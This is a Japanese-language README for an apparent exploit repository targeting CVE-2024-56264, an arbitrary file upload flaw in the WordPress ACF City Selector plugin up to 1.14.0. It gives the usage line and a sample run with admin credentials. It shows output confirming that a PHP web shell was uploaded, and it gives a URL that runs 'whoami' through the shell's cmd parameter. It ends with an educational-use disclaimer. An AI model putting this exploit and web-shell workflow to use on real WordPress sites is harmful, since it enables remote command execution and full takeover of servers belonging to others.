
CVE-2024-56264 の Python エクスプロイト。WordPress ACF City Selector プラグイン 1.14.0 以下の任意のファイルアップロード脆弱性であり、ウェブシェルアップロードを介したリモートコード実行を可能にします。
このリポジトリには、WordPress ACF City Selector プラグイン(バージョン <= 1.14.0)で見つかった 任意ファイルアップロード 脆弱性である CVE-2024-56264 のエクスプロイトが含まれています。この脆弱性により、攻撃者は脆弱なWordPressインスタンスに 悪意のあるPHPファイル(ウェブシェル) をアップロードし、サーバー上で任意のコマンドを実行できます。
<= 1.14.0ACF City Selector プラグインはアップロードされたファイルを適切に検証できず、攻撃者が制限を回避して任意のPHPファイルをアップロードすることを可能にします。悪意のあるPHPファイルがアップロードされると、攻撃者はリモートでシステムコマンドを実行でき、サーバー全体の乗っ取りにつながります。
スクリプトを実行する前に、以下がインストールされていることを確認してください:
requests モジュール(インストール: pip install requests)必要な依存関係は次のコマンドでインストールできます:
pip install -r requirements.txt
エクスプロイトの実行:
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
正常にエクスプロイトが成功すると、次のように表示されます:
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
成功した場合、アップロードされたシェルに以下のURLでアクセスします:
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
これにより、サーバー上でのリモートコマンド実行が可能になります。
このスクリプトは教育および許可されたセキュリティテスト目的のみを意図しています。無断使用は違法であり、重大な結果を招く可能性があります。著者はこのエクスプロイトの誤用について一切の責任を負いません。